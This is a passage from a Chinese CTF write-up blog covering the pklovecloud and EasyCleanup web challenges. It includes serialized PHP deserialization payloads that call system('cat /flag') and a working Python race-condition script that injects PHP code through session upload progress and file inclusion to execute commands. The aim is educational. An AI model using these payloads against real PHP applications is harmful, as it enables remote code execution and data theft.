<pre><code class="hljs plaintext">?pks=O%3A3%3A%22acp%22%3A3%3A%7Bs%3A6%3A%22cinder%22%3BO%3A3%3A%22ace%22%3A3%3A%7Bs%3A8%3A%22filename%22%3Bs%3A9%3A%22%2Fflag.php%22%3Bs%3A9%3A%22openstack%22%3BN%3Bs%3A6%3A%22docker%22%3Bs%3A0%3A%22%22%3B%7Ds%3A7%3A%22neutron%22%3BN%3Bs%3A4%3A%22nova%22%3BN%3B%7D</code></pre>
<p><img src="https://z4a.net/images/2022/06/02/image9c886f41229594dd.png" alt="image9c886f41229594dd.png"></p>
<pre><code class="hljs plaintext">
&lt;?php
// ctfhub&#123;1035800175138278d4dba43e&#125;;
$heat=&#x27;asdwe1g648798qwe321d65&#x27;;
?&gt;</code></pre>
<h2 id="php反序列化题型扩展">php反序列化题型扩展</h2>
<p>看这个题目</p>
<pre><code class="hljs php"><span class="hljs-meta">&lt;?php</span>
<span class="hljs-comment">#error_reporting(0);</span>
<span class="hljs-class"><span class="hljs-keyword">class</span> <span class="hljs-title">HelloPhp</span></span>
<span class="hljs-class"></span>&#123;
    <span class="hljs-keyword">public</span> <span class="hljs-variable">$a</span>;
    <span class="hljs-keyword">public</span> <span class="hljs-variable">$b</span>;
    <span class="hljs-keyword">public</span> <span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">__construct</span>(<span class="hljs-params"></span>)</span>&#123;
        <span class="hljs-variable language_">$this</span>-&gt;a = <span class="hljs-string">&quot;Y-m-d h:i:s&quot;</span>;
        <span class="hljs-variable language_">$this</span>-&gt;b = <span class="hljs-string">&quot;date&quot;</span>;
    &#125;
    <span class="hljs-keyword">public</span> <span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">__destruct</span>(<span class="hljs-params"></span>)</span>&#123;
        <span class="hljs-variable">$a</span> = <span class="hljs-variable language_">$this</span>-&gt;a;
        <span class="hljs-variable">$b</span> = <span class="hljs-variable language_">$this</span>-&gt;b;
        <span class="hljs-keyword">echo</span> <span class="hljs-variable">$b</span>(<span class="hljs-variable">$a</span>);
    &#125;
&#125;
<span class="hljs-variable">$c</span> = <span class="hljs-keyword">new</span> <span class="hljs-title class_">HelloPhp</span>;

<span class="hljs-keyword">if</span>(<span class="hljs-keyword">isset</span>(<span class="hljs-variable">$_GET</span>[<span class="hljs-string">&#x27;source&#x27;</span>]))
&#123;
    <span class="hljs-title function_ invoke__">highlight_file</span>(<span class="hljs-keyword">__FILE__</span>);
    <span class="hljs-keyword">die</span>(<span class="hljs-number">0</span>);
&#125;

@<span class="hljs-variable">$ppp</span> = <span class="hljs-title function_ invoke__">unserialize</span>(<span class="hljs-variable">$_GET</span>[<span class="hljs-string">&quot;data&quot;</span>]);</code></pre>
<p>HelloPhp这个类用到了两个魔术函数,_construct()和_destruct()，在<code>__destruct</code>方法中,使用成员变量<code>$a</code>作为参数<code>$b</code>作为变量函数名执行代码，在代码最后接收GET参数并进行反序列化。</p>
<p>只需要通过构造<code>$a</code>与<code>$b</code>组成危险代码,然后构造HelloPhp类的序列化对象即可</p>
<pre><code class="hljs php"><span class="hljs-meta">&lt;?php</span>
<span class="hljs-class"><span class="hljs-keyword">class</span> <span class="hljs-title">HelloPhp</span></span>
<span class="hljs-class"></span>&#123;
    <span class="hljs-keyword">public</span> <span class="hljs-variable">$a</span>=<span class="hljs-string">&#x27;cat /flag&#x27;</span>;
    <span class="hljs-keyword">public</span> <span class="hljs-variable">$b</span>=<span class="hljs-string">&#x27;system&#x27;</span>;
&#125;
<span class="hljs-variable">$c</span>=<span class="hljs-keyword">new</span> <span class="hljs-title class_">HelloPhp</span>;   
<span class="hljs-keyword">echo</span> <span class="hljs-title function_ invoke__">serialize</span>(<span class="hljs-variable">$c</span>);
</code></pre>
<pre><code class="hljs php">O:<span class="hljs-number">8</span>:<span class="hljs-string">&quot;HelloPhp&quot;</span>:<span class="hljs-number">2</span>:&#123;s:<span class="hljs-number">1</span>:<span class="hljs-string">&quot;a&quot;</span>;s:<span class="hljs-number">9</span>:<span class="hljs-string">&quot;cat /flag&quot;</span>;s:<span class="hljs-number">1</span>:<span class="hljs-string">&quot;b&quot;</span>;s:<span class="hljs-number">6</span>:<span class="hljs-string">&quot;system&quot;</span>;&#125;</code></pre>
<h1 id="easycleanup">EasyCleanup</h1>
<ul>
<li>文件包含</li>
</ul>
<pre><code class="hljs plaintext">&lt;?php

if(!isset($_GET[&#x27;mode&#x27;]))&#123;
    highlight_file(__file__);
&#125;else if($_GET[&#x27;mode&#x27;] == &quot;eval&quot;)&#123;
    $shell = $_GET[&#x27;shell&#x27;] ?? &#x27;phpinfo();&#x27;;
    if(strlen($shell) &gt; 15 | filter($shell) | checkNums($shell)) exit(&quot;hacker&quot;);
    eval($shell);
&#125;


if(isset($_GET[&#x27;file&#x27;]))&#123;
    if(strlen($_GET[&#x27;file&#x27;]) &gt; 15 | filter($_GET[&#x27;file&#x27;])) exit(&quot;hacker&quot;);
    include $_GET[&#x27;file&#x27;];
&#125;


function filter($var): bool&#123;
    $banned = [&quot;while&quot;, &quot;for&quot;, &quot;\$_&quot;, &quot;include&quot;, &quot;env&quot;, &quot;require&quot;, &quot;?&quot;, &quot;:&quot;, &quot;^&quot;, &quot;+&quot;, &quot;-&quot;, &quot;%&quot;, &quot;*&quot;, &quot;`&quot;];

    foreach($banned as $ban)&#123;
        if(strstr($var, $ban)) return True;
    &#125;

    return False;
&#125;

function checkNums($var): bool&#123;
    $alphanum = &#x27;abcdefghijklmnopqrstuvwxyz0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ&#x27;;
    $cnt = 0;
    for($i = 0; $i &lt; strlen($alphanum); $i++)&#123;
        for($j = 0; $j &lt; strlen($var); $j++)&#123;
            if($var[$j] == $alphanum[$i])&#123;
                $cnt += 1;
                if($cnt &gt; 8) return True;
            &#125;
        &#125;
    &#125;
    return False;
&#125;
?&gt;</code></pre>
<p>传个eval可以直接看到phpionfo<img src="https://z4a.net/images/2022/06/02/image85d1e6c8234890ca.png" alt="image85d1e6c8234890ca.png"></p>
<p>用个脚本就行，还有文件包含的方法有时间再试试</p>
<pre><code class="hljs python"><span class="hljs-keyword">import</span> io
<span class="hljs-keyword">import</span> sys
<span class="hljs-keyword">import</span> requests
<span class="hljs-keyword">import</span> threading
host = <span class="hljs-string">&#x27;http://challenge-983911a7e85eadf8.sandbox.ctfhub.com:10800/&#x27;</span>
sessid = <span class="hljs-string">&#x27;aa&#x27;</span>
<span class="hljs-keyword">def</span> <span class="hljs-title function_">POST</span>(<span class="hljs-params">session</span>):
    <span class="hljs-keyword">while</span> <span class="hljs-literal">True</span>:
        f = io.BytesIO(<span class="hljs-string">b&#x27;a&#x27;</span> * <span class="hljs-number">1024</span> * <span class="hljs-number">50</span>)
        session.post(
            host,
            data=&#123;<span class="hljs-string">&quot;PHP_SESSION_UPLOAD_PROGRESS&quot;</span>:<span class="hljs-string">&quot;&lt;?php system(&#x27;cat flag_is_here_not_are_but_you_find&#x27;);echo md5(&#x27;1&#x27;);?&gt;&quot;</span>&#125;,
            files=&#123;<span class="hljs-string">&quot;file&quot;</span>:(<span class="hljs-string">&#x27;a.txt&#x27;</span>, f)&#125;,
            cookies=&#123;<span class="hljs-string">&#x27;PHPSESSID&#x27;</span>:sessid&#125;,
        )
 
<span class="hljs-keyword">def</span> <span class="hljs-title function_">READ</span>(<span class="hljs-params">session</span>):
    <span class="hljs-keyword">while</span> <span class="hljs-literal">True</span>:
        response = session.get(<span class="hljs-string">f&#x27;<span class="hljs-subst">&#123;host&#125;</span>?file=/tmp/sess_<span class="hljs-subst">&#123;sessid&#125;</span>&#x27;</span>)
        <span class="hljs-comment"># print(response.text)</span>
        <span class="hljs-keyword">if</span> <span class="hljs-string">&#x27;c4ca4238a0b923820dcc509a6f75849b&#x27;</span> <span class="hljs-keyword">not</span> <span class="hljs-keyword">in</span> response.text:
            <span class="hljs-built_in">print</span>(<span class="hljs-string">&#x27;[+++]retry&#x27;</span>)
        <span class="hljs-keyword">else</span>:
            <span class="hljs-built_in">print</span>(response.text)
            <span class="hljs-keyword">break</span>
 
<span class="hljs-keyword">with</span> requests.session() <span class="hljs-keyword">as</span> session:
    t1 = threading.Thread(target=POST, args=(session, ))
    t1.daemon = <span class="hljs-literal">True</span>
    t1.start()
    READ(session)</code></pre>
<p><img src="https://z4a.net/images/2022/06/02/image56affc20afdb8901.png" alt="image56affc20afdb8901.png"></p>
<p>得到flag</p>
<pre><code class="hljs plaintext">ctfhub&#123;b3e1bc40dcd3963ea50bed39&#125;</code></pre>

    </div>

    
    
    
        <div class="reward-container">
  <div>制作不易，如若感觉写的不错，欢迎打赏</div>
  <button onclick="var qr = document.getElementById('qr'); qr.style.display = (qr.style.display === 'none') ? 'block' : 'none';">
    打赏
  </button>
  <div id="qr" style="display: none;">
      
      <div style="display: inline-block;">
        <img src="/images/wechat.jpg" alt="故里 微信支付">
        <p>微信支付</p>
      </div>
      
      <div style="display: inline-block;">
        <img src="/images/zhifubao.jpg" alt="故里 支付宝">
        <p>支付宝</p>
      </div>

  </div>
</div>

        

<div>
<ul class="post-copyright">
  <li class="post-copyright-author">
    <strong>本文作者： </strong>故里
  </li>
  <li class="post-copyright-link">
    <strong>本文链接：</strong>
    <a href="https://hzy2003628.top/2022/06/01/%E7%AC%AC%E4%BA%94%E5%B1%8A%E4%B8%96%E7%95%8C%E6%99%BA%E8%83%BD%E5%A4%A7%E4%BC%9A/" title="第五届世界智能大会[津门杯]">https://hzy2003628.top/2022/06/01/第五届世界智能大会/</a>
  </li>
  <li class="post-copyright-license">
    <strong>版权声明： </strong>本博客所有文章除特别声明外，均采用 <a href="https://creativecommons.org/licenses/by-nc-sa/4.0/" rel="noopener" target="_blank"><i class="fab fa-fw fa-creative-commons"></i>BY-NC-SA</a> 许可协议。转载请注明出处！
  </li>
</ul>
</div>


      <footer class="post-footer">
          
          <div class="post-tags">
              <a href="/tags/%E8%B5%9B%E5%90%8E%E5%A4%8D%E7%9B%98/" rel="tag"><i class="fa fa-tag"></i> 赛后复盘</a>
              <a href="/tags/CTF/" rel="tag"><i class="fa fa-tag"></i> CTF</a>
          </div>

        



        
    <div class="post-nav">
      <div class="post-nav-item">
    <a href="/2022/05/27/520/" rel="prev" title="Dest0g3 520迎新赛">
      <i class="fa fa-chevron-left"></i> Dest0g3 520迎新赛
    </a></div>
      <div class="post-nav-item">
    <a href="/2022/06/04/bcactf/" rel="next" title="BCACTF">
      BCACTF <i class="fa fa-chevron-right"></i>
    </a></div>
    </div>
      </footer>
    
  </article>
  
  
  



          </div>
          
    <div class="comments" id="valine-comments"></div>

<script>
  window.addEventListener('tabs:register', () => {
    let { activeClass } = CONFIG.comments;
    if (CONFIG.comments.storage) {
      activeClass = localStorage.getItem('comments_active') || activeClass;
    }
    if (activeClass) {
      let activeTab = document.querySelector(`a[href="#comment-${activeClass}"]`);
      if (activeTab) {
        activeTab.click();
      }
    }
  });
  if (CONFIG.comments.storage) {
    window.addEventListener('tabs:click', event => {
      if (!event.target.matches('.tabs-comment .tab-content .tab-pane')) return;
      let commentClass = event.target.classList[1];
      localStorage.setItem('comments_active', commentClass);
    });
  }
</script>




        </div>
          
  
  <div class="toggle sidebar-toggle">
    <span class="toggle-line toggle-line-first"></span>
    <span class="toggle-line toggle-line-middle"></span>
    <span class="toggle-line toggle-line-last"></span>
  </div>

  <aside class="sidebar">
    <div class="sidebar-inner">

      <ul class="sidebar-nav motion-element">
        <li class="sidebar-nav-toc">
          文章目录
        </li>
        <li class="sidebar-nav-overview">
          站点概览
        </li>
      </ul>

      <!--noindex-->
      <div class="post-toc-wrap sidebar-panel">
          <div class="post-toc motion-element"><ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#hate_php"><span class="nav-number">1.</span> <span class="nav-text">hate_php</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#png%E5%9B%BE%E7%89%87%E8%BD%AC%E6%8D%A2%E5%99%A8"><span class="nav-number">2.</span> <span class="nav-text">PNG图片转换器</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#yet_another_mysql_injection"><span class="nav-number">3.</span> <span class="nav-text">yet_another_mysql_injection</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#pklovecloud"><span class="nav-number">4.</span> <span class="nav-text">pklovecloud</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#php%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E9%A2%98%E5%9E%8B%E6%89%A9%E5%B1%95"><span class="nav-number">4.1.</span> <span class="nav-text">php反序列化题型扩展</span></a></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link" href="#easycleanup"><span class="nav-number">5.</span> <span class="nav-text">EasyCleanup</span></a></li></ol></div>
      </div>
      <!--/noindex-->

      <div class="site-overview-wrap sidebar-panel">
        <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
    <img class="site-author-image" itemprop="image" alt="故里"
      src="/images/avatar.png">
  <p class="site-author-name" itemprop="name">故里</p>
  <div class="site-description" itemprop="description">没有所谓失败，除非你不再尝试</div>
</div>
<div class="site-state-wrap motion-element">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
          <a href="/archives/">
        
          <span class="site-state-item-count">108</span>
          <span class="site-state-item-name">日志</span>
        </a>
      </div>
      <div class="site-state-item site-state-categories">
            <a href="/categories/">
          
        <span class="site-state-item-count">19</span>
        <span class="site-state-item-name">分类</span></a>
      </div>
      <div class="site-state-item site-state-tags">
            <a href="/tags/">
          
        <span class="site-state-item-count">38</span>
        <span class="site-state-item-name">标签</span></a>
      </div>
  </nav>
</div>
  <div class="links-of-author motion-element">
      <span class="links-of-author-item">
        <a href="mailto:2596328958@qq.com" title="E-Mail → mailto:2596328958@qq.com" rel="noopener" target="_blank"><i class="envelope fa-fw"></i>E-Mail</a>
      </span>
  </div>



      </div>
	  

	     <!-- canvas粒子时钟 -->
        
        <div id="">
  <canvas id="canvas" style="width:60%;">
</div>
<script async>
(function(){
  var WINDOW_WIDTH = 820;
  		var WINDOW_HEIGHT = 250;
  		var RADIUS = 7; //球半径
  		var NUMBER_GAP = 10; //数字之间的间隙
  		var u=0.65; //碰撞能量损耗系数
  		var context; //Canvas绘制上下文
  		var balls = []; //存储彩色的小球
  		const colors = ["#33B5E5","#0099CC","#AA66CC","#9933CC","#99CC00","#669900","#FFBB33","#FF8800","#FF4444","#CC0000"]; //彩色小球的颜色
  		var currentNums = []; //屏幕显示的8个字符
  		var digit =
                  [
                      [
                          [0,0,1,1,1,0,0],
                          [0,1,1,0,1,1,0],
                          [1,1,0,0,0,1,1],
                          [1,1,0,0,0,1,1],
                          [1,1,0,0,0,1,1],
                          [1,1,0,0,0,1,1],
                          [1,1,0,0,0,1,1],
                          [1,1,0,0,0,1,1],
                          [0,1,1,0,1,1,0],
                          [0,0,1,1,1,0,0]
                      ],//0
                      [
                          [0,0,0,1,1,0,0],
                          [0,1,1,1,1,0,0],
                          [0,0,0,1,1,0,0],
                          [0,0,0,1,1,0,0],
                          [0,0,0,1,1,0,0],
                          [0,0,0,1,1,0,0],
                          [0,0,0,1,1,0,0],
                          [0,0,0,1,1,0,0],
                          [0,0,0,1,1,0,0],
                          [1,1,1,1,1,1,1]
                      ],//1
                      [
                          [0,1,1,1,1,1,0],
                          [1,1,0,0,0,1,1],
                          [0,0,0,0,0,1,1],
                          [0,0,0,0,1,1,0],
                          [0,0,0,1,1,0,0],
                          [0,0,1,1,0,0,0],
                          [0,1,1,0,0,0,0],
                          [1,1,0,0,0,0,0],
                          [1,1,0,0,0,1,1],
                          [1,1,1,1,1,1,1]
                      ],//2
                      [
                          [1,1,1,1,1,1,1],
                          [0,0,0,0,0,1,1],
                          [0,0,0,0,1,1,0],
                          [0,0,0,1,1,0,0],
                          [0,0,1,1,1,0,0],
                          [0,0,0,0,1,1,0],
                          [0,0,0,0,0,1,1],
                          [0,0,0,0,0,1,1],
                          [1,1,0,0,0,1,1],
                          [0,1,1,1,1,1,0]
                      ],//3
                      [
                          [0,0,0,0,1,1,0],
                          [0,0,0,1,1,1,0],
                          [0,0,1,1,1,1,0],
                          [0,1,1,0,1,1,0],
                          [1,1,0,0,1,1,0],
                          [1,1,1,1,1,1,1],
                          [0,0,0,0,1,1,0],
                          [0,0,0,0,1,1,0],
                          [0,0,0,0,1,1,0],
                          [0,0,0,1,1,1,1]
                      ],//4
                      [
                          [1,1,1,1,1,1,1],
                          [1,1,0,0,0,0,0],
                          [1,1,0,0,0,0,0],
                          [1,1,1,1,1,1,0],
                          [0,0,0,0,0,1,1],
                          [0,0,0,0,0,1,1],
                          [0,0,0,0,0,1,1],
                          [0,0,0,0,0,1,1],
                          [1,1,0,0,0,1,1],
                          [0,1,1,1,1,1,0]
                      ],//5
                      [
                          [0,0,0,0,1,1,0],
                          [0,0,1,1,0,0,0],
                          [0,1,1,0,0,0,0],
                          [1,1,0,0,0,0,0],
                          [1,1,0,1,1,1,0],
                          [1,1,0,0,0,1,1],
                          [1,1,0,0,0,1,1],
                          [1,1,0,0,0,1,1],
                          [1,1,0,0,0,1,1],
                          [0,1,1,1,1,1,0]
                      ],//6
                      [
                          [1,1,1,1,1,1,1],
                          [1,1,0,0,0,1,1],
                          [0,0,0,0,1,1,0],
                          [0,0,0,0,1,1,0],
                          [0,0,0,1,1,0,0],
                          [0,0,0,1,1,0,0],
                          [0,0,1,1,0,0,0],
                          [0,0,1,1,0,0,0],
                          [0,0,1,1,0,0,0],
                          [0,0,1,1,0,0,0]
                      ],//7
                      [
                          [0,1,1,1,1,1,0],
                          [1,1,0,0,0,1,1],
                          [1,1,0,0,0,1,1],
                          [1,1,0,0,0,1,1],
                          [0,1,1,1,1,1,0],
                          [1,1,0,0,0,1,1],
                          [1,1,0,0,0,1,1],
                          [1,1,0,0,0,1,1],
                          [1,1,0,0,0,1,1],
                          [0,1,1,1,1,1,0]
                      ],//8
                      [
                          [0,1,1,1,1,1,0],
                          [1,1,0,0,0,1,1],
                          [1,1,0,0,0,1,1],
                          [1,1,0,0,0,1,1],
                          [0,1,1,1,0,1,1],
                          [0,0,0,0,0,1,1],
                          [0,0,0,0,0,1,1],
                          [0,0,0,0,1,1,0],
                          [0,0,0,1,1,0,0],
                          [0,1,1,0,0,0,0]
                      ],//9
                      [
                          [0,0,0,0],
                          [0,0,0,0],
                          [0,1,1,0],
                          [0,1,1,0],
                          [0,0,0,0],
                          [0,0,0,0],
                          [0,1,1,0],
                          [0,1,1,0],
                          [0,0,0,0],
                          [0,0,0,0]
                      ]//:
                  ];

  		function drawDatetime(cxt){
  			var nums = [];

  			context.fillStyle="#005eac"
  			var date = new Date();
  			var offsetX = 70, offsetY = 30;
  			var hours = date.getHours();
  			var num1 = Math.floor(hours/10);
  			var num2 = hours%10;
  			nums.push({num: num1});
  			nums.push({num: num2});
  			nums.push({num: 10}); //冒号
  			var minutes = date.getMinutes();
  			var num1 = Math.floor(minutes/10);
  			var num2 = minutes%10;
  			nums.push({num: num1});
  			nums.push({num: num2});
  			nums.push({num: 10}); //冒号
  			var seconds = date.getSeconds();
  			var num1 = Math.floor(seconds/10);
  			var num2 = seconds%10;
  			nums.push({num: num1});
  			nums.push({num: num2});

  			for(var x = 0;x<nums.length;x++){
  				nums[x].offsetX = offsetX;
  				offsetX = drawSingleNumber(offsetX,offsetY, nums[x].num,cxt);
  				//两个数字连一块，应该间隔一些距离
  				if(x<nums.length-1){
  					if((nums[x].num!=10) &&(nums[x+1].num!=10)){
  						offsetX+=NUMBER_GAP;
  					}
  				}
  			}

  			//说明这是初始化
  			if(currentNums.length ==0){
  				currentNums = nums;
  			}else{
  				//进行比较
  				for(var index = 0;index<currentNums.length;index++){
  					if(currentNums[index].num!=nums[index].num){
  						//不一样时，添加彩色小球
  						addBalls(nums[index]);
  						currentNums[index].num=nums[index].num;
  					}
  				}
  			}
  			renderBalls(cxt);
  			updateBalls();

  			return date;
  		}

  		function addBalls (item) {
  			var num = item.num;
  			var numMatrix = digit[num];
  			for(var y = 0;y<numMatrix.length;y++){
  				for(var x = 0;x<numMatrix[y].length;x++){
  					if(numMatrix[y][x]==1){
  						var ball={
  							offsetX:item.offsetX+RADIUS+RADIUS*2*x,
  							offsetY:30+RADIUS+RADIUS*2*y,
  							color:colors[Math.floor(Math.random()*colors.length)],
  							g:1.5+Math.random(),
  							vx:Math.pow(-1, Math.ceil(Math.random()*10))*4+Math.random(),
  							vy:-5
  						}
  						balls.push(ball);
  					}
  				}
  			}
  		}

  		function renderBalls(cxt){
  			for(var index = 0;index<balls.length;index++){
  				cxt.beginPath();
  				cxt.fillStyle=balls[index].color;
  				cxt.arc(balls[index].offsetX, balls[index].offsetY, RADIUS, 0, 2*Math.PI);
  				cxt.fill();
  			}
  		}

  		function updateBalls () {
  			var i =0;
  			for(var index = 0;index<balls.length;index++){
  				var ball = balls[index];
  				ball.offsetX += ball.vx;
  				ball.offsetY += ball.vy;
  				ball.vy+=ball.g;
  				if(ball.offsetY > (WINDOW_HEIGHT-RADIUS)){
  					ball.offsetY= WINDOW_HEIGHT-RADIUS;
  					ball.vy=-ball.vy*u;
  				}
  				if(ball.offsetX>RADIUS&&ball.offsetX<(WINDOW_WIDTH-RADIUS)){

  					balls[i]=balls[index];
  					i++;
  				}
  			}
  			//去除出边界的球
  			for(;i<balls.length;i++){
  				balls.pop();
  			}
  		}
  		function drawSingleNumber(offsetX, offsetY, num, cxt){
  			var numMatrix = digit[num];
  			for(var y = 0;y<numMatrix.length;y++){
  				for(var x = 0;x<numMatrix[y].length;x++){
  					if(numMatrix[y][x]==1){
  						cxt.beginPath();
  						cxt.arc(offsetX+RADIUS+RADIUS*2*x,offsetY+RADIUS+RADIUS*2*y,RADIUS,0,2*Math.PI);
  						cxt.fill();
  					}
  				}
  			}
  			cxt.beginPath();
  			offsetX += numMatrix[0].length*RADIUS*2;
  			return offsetX;
  		}

  		var canvas = document.getElementById("canvas");
  		canvas.width=WINDOW_WIDTH;
  		canvas.height=WINDOW_HEIGHT;
  		context = canvas.getContext("2d");

  		//记录当前绘制的时刻
  		var currentDate = new Date();

  		setInterval(function(){
  			//清空整个Canvas，重新绘制内容
  			context.clearRect(0, 0, context.canvas.width, context.canvas.height);
  			drawDatetime(context);
  		}, 50)
})();
</script>


      


<!--添加标签云-->
        
          <script type="text/javascript" charset="utf-8" src="/js/tagcloud.js"></script>
          <script type="text/javascript" charset="utf-8" src="/js/tagcanvas.js"></script>
          <div class="widget-wrap">
            <div>标签云</div>
            <div id="myCanvasContainer" class="widget tagcloud">
              <canvas width="250" height="250" id="resCanvas" style="width=100%">
              <ul class="tag-list" itemprop="keywords"><li class="tag-list-item"><a class="tag-list-link" href="/tags/C/" rel="tag">C</a><span class="tag-list-count">1</span></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/CTF/" rel="tag">CTF</a><span class="tag-list-count">73</span></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/HTTP%E5%A4%B4%E9%83%A8%E4%BF%A1%E6%81%AF%E5%88%86%E6%9E%90/" rel="tag">HTTP头部信息分析</a><span class="tag-list-count">1</span></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/PHP%E4%BC%AA%E5%8D%8F%E8%AE%AE/" rel="tag">PHP伪协议</a><span class="tag-list-count">1</span></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/PHP%E7%89%B9%E6%80%A7/" rel="tag">PHP特性</a><span class="tag-list-count">1</span></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/PWN/" rel="tag">PWN</a><span class="tag-list-count">1</span></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/RE/" rel="tag">RE</a><span class="tag-list-count">1</span></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/SQL/" rel="tag">SQL</a><span class="tag-list-count">2</span></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/Web/" rel="tag">Web</a><span class="tag-list-count">14</span></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/Web%E5%B7%A5%E5%85%B7%E5%8C%85/" rel="tag">Web工具包</a><span class="tag-list-count">1</span></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/awd/" rel="tag">awd</a><span class="tag-list-count">2</span></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/ctfshow/" rel="tag">ctfshow</a><span class="tag-list-count">6</span></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/misc/" rel="tag">misc</a><span class="tag-list-count">1</span></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/next%E4%B8%BB%E9%A2%98%E5%A4%B1%E6%95%88/" rel="tag">next主题失效</a><span class="tag-list-count">1</span></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/sqlmap/" rel="tag">sqlmap</a><span class="tag-list-count">1</span></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/web/" rel="tag">web</a><span class="tag-list-count">2</span></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/wp/" rel="tag">wp</a><span class="tag-list-count">2</span></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/xss/" rel="tag">xss</a><span class="tag-list-count">1</span></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/xxe/" rel="tag">xxe</a><span class="tag-list-count">1</span></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/%E4%B8%8D%E8%92%9C%E5%AD%90%E4%B8%8D%E6%98%BE%E7%A4%BA/" rel="tag">不蒜子不显示</a><span class="tag-list-count">1</span></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/%E5%8D%9A%E5%AE%A2/" rel="tag">博客</a><span class="tag-list-count">5</span></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/%E5%8D%9A%E5%AE%A2%E4%B8%BB%E9%A2%98%E4%BC%98%E5%8C%96/" rel="tag">博客主题优化</a><span class="tag-list-count">1</span></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/%E5%8D%9A%E5%AE%A2%E6%AD%BB%E5%BE%AA%E7%8E%AF%E6%A1%86%E6%9E%B6%E9%97%AE%E9%A2%98/" rel="tag">博客死循环框架问题</a><span class="tag-list-count">1</span></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/%E5%8D%9A%E5%AE%A2%E9%83%A8%E5%88%86%E9%97%AE%E9%A2%98%E8%A7%A3%E5%86%B3%E6%96%B9%E6%B3%95/" rel="tag">博客部分问题解决方法</a><span class="tag-list-count">1</span></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96/" rel="tag">反序列化</a><span class="tag-list-count">1</span></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C/" rel="tag">命令执行</a><span class="tag-list-count">1</span></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/%E5%B1%80%E5%9F%9F%E7%BD%91%E6%94%BB%E5%87%BB/" rel="tag">局域网攻击</a><span class="tag-list-count">1</span></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/%E5%B8%B8%E7%94%A8%E6%8C%87%E4%BB%A4/" rel="tag">常用指令</a><span class="tag-list-count">1</span></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/%E5%BF%83%E5%BE%97/" rel="tag">心得</a><span class="tag-list-count">1</span></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E6%BC%8F%E6%B4%9E/" rel="tag">文件上传漏洞</a><span class="tag-list-count">1</span></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/%E6%96%87%E4%BB%B6%E5%8C%85%E5%90%AB/" rel="tag">文件包含</a><span class="tag-list-count">1</span></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/%E6%B5%81%E9%87%8F%E5%88%86%E6%9E%90/" rel="tag">流量分析</a><span class="tag-list-count">1</span></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/%E6%B8%97%E9%80%8F/" rel="tag">渗透</a><span class="tag-list-count">4</span></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95/" rel="tag">渗透测试</a><span class="tag-list-count">5</span></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0/" rel="tag">漏洞复现</a><span class="tag-list-count">3</span></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/%E7%95%99%E8%A8%80%E6%9D%BF/" rel="tag">留言板</a><span class="tag-list-count">1</span></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/%E8%B5%9B%E5%90%8E%E5%A4%8D%E7%9B%98/" rel="tag">赛后复盘</a><span class="tag-list-count">58</span></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/%E9%BB%91%E7%9B%92%E6%B5%8B%E8%AF%95/" rel="tag">黑盒测试</a><span class="tag-list-count">1</span></li></ul>
              </canvas>
            </div>
         </div>
        
	  



 
	  
	  


   </div>
  </aside>
  <div id="sidebar-dimmer"></div>


      </div>
    </main>

    <footer class="footer">
      <div class="footer-inner">
        

        
  <div class="beian"><a href="https://beian.miit.gov.cn/" rel="noopener" target="_blank">豫ICP备2022003011号-1 </a>
      <img src="/images/beian.png" style="display: inline-block;"><a href="http://www.beian.gov.cn/portal/registerSystemInfo?recordcode=%E8%B1%AB%E5%85%AC%E7%BD%91%E5%AE%89%E5%A4%87%2041142602000197%E5%8F%B7" rel="noopener" target="_blank">豫公网安备 41142602000197号 </a>
  </div>


<div class="copyright">
  
  &copy; 
  <span itemprop="copyrightYear">2024</span>
  <span class="with-love">
    <i class="fa fa-heart"></i>
   </span>
